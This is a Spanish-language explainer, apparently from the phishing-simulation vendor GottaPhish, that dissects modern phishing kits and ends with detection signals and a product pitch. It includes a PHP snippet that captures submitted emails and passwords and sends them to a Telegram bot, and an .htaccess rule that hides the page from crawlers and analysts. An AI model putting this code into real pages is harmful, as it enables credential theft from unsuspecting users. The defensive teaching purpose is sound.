Anatomía de un kit de phishing moderno
Un «kit de phishing» es el código empaquetado y reutilizable que los atacantes despliegan para clonar una página de inicio de sesión, cosechar credenciales y exfiltrarlas. Entender cómo se construyen estos kits —y cómo se ocultan— hace mucho más fácil detectar campañas a tiempo y construir simulaciones defensivas convincentes.
Qué contiene un kit
Un kit típico es un archivo ZIP soltado en un servidor comprometido o en un alojamiento barato. Su estructura es notablemente constante:
kit/
├── index.php # la página de inicio clonada
├── login.php # gestor del formulario: captura y reenvía credenciales
├── assets/ # copias exactas de CSS, JS, logotipos, tipografías
├── config.php # destino de exfiltración (correo, bot de Telegram, URL remota)
├── antibots.php # listas de bloqueo de crawlers, sandboxes, investigadores
└── .htaccess # reescrituras, filtrado geo/IP, protección hotlink
Los kits modernos se venden cada vez más «como servicio» (PhaaS, Phishing-as-a-Service), con paneles de suscripción, actualizaciones y soporte.
El clon
La página de inicio suele ser una copia byte a byte de una pantalla de acceso real, capturada con un aspirador de sitios o un navegador headless. Dos indicios son habituales:
- URL absolutas de recursos que siguen apuntando al CDN legítimo (así la página carga logotipos reales mientras el formulario envía al atacante).
- Un
<form>cuyoactionapunta a un gestor PHP local en lugar del endpoint real de la marca.
Los kits avanzados hacen de proxy del sitio real en tiempo real (un montaje de adversario en el medio con herramientas como Evilginx), retransmitiendo lo que teclea la víctima al servidor genuino y robando la cookie de sesión resultante, lo que derrota a la mayoría de la MFA.
Capa antianálisis
El componente antibots es lo que mantiene vivo un kit. Filtra a los visitantes antes de servir la página de phishing:
- Filtrado por user-agent y ASN: bloquea crawlers conocidos y los rangos de IP de Google, Microsoft, fabricantes de seguridad y sandboxes en la nube.
- Comprobaciones de referer y geo: solo sirve la página a objetivos del país esperado y redirige al resto al sitio legítimo.
- Limitación de tasa y enlaces de un solo uso: un token en la URL que se quema tras una única visita, de modo que una muestra reenviada muestra un inofensivo 404.
# fragmento de .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
Por eso una URL que a un analista del SOC le «parece muerta» estaba plenamente viva para la víctima minutos antes.
Captura y exfiltración de credenciales
El gestor valida lo justo para parecer real y luego envía los datos. Canales de exfiltración, en orden aproximado de popularidad:
- SMTP / mail() a un buzón fijado en el código.
- API de bots de Telegram: una llamada
sendMessagea un token de bot, barata y resistente. - POST a una URL de C2 o a un webhook de Discord.
- Archivo de registro local que el operador recoge más tarde.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Fíjese en la redirección final: tras «fallar el inicio de sesión», la víctima acaba en el sitio real, supone que ha tecleado mal, entra con éxito y no sospecha nada.
Alojamiento y entrega
Los kits prefieren infraestructura desechable: sitios WordPress comprometidos, redirecciones abiertas en dominios de confianza, dominios parecidos recién registrados y, cada vez más, servicios legítimos (Cloudflare Workers, IPFS, SharePoint, Google Docs) para tomar prestada su reputación. La entrega empareja el kit con un señuelo: una factura, una «reverificación» de MFA, un aviso de documento compartido.
Detección defensiva
Señales que merece la pena cazar:
- Dominios recién registrados que se parecen a su marca (vigile los registros CT y los typosquats).
- Hashing de favicon y del DOM: los kits reutilizan los recursos exactos de la marca clonada.
- Llamadas salientes a Telegram o webhooks desde servidores web que no tienen por qué hacerlas.
- Envío de credenciales a orígenes inesperados en la telemetría del navegador.
- Informes agregados de DMARC que revelan intentos de suplantación contra su dominio.
La verdad incómoda: un kit AiTM bien construido derrota a la MFA por SMS y por aplicación robando el token de sesión. Los métodos resistentes al phishing —FIDO2 / passkeys— son la solución duradera.
Cómo ayuda GottaPhish
Los kits de phishing modernos convierten en arma los clones pixel a pixel y el robo de sesión AiTM, que incluso derrotan a la MFA por SMS y por aplicación. GottaPhish y su equipo de expertos le ayudan a enfrentar justamente esa amenaza: simulaciones seguras y plenamente auditadas que reflejan kits reales —enlaces con token, flujos de captura de credenciales, escenarios AiTM— con paneles que muestran qué señuelos calan y dónde aguanta la MFA. Nuestros expertos acompañan la puesta en marcha, diseñan escenarios que reproducen el oficio actual del PhaaS y ayudan a interpretar los resultados como formación específica y como señales concretas de ingeniería de detección para su SOC.
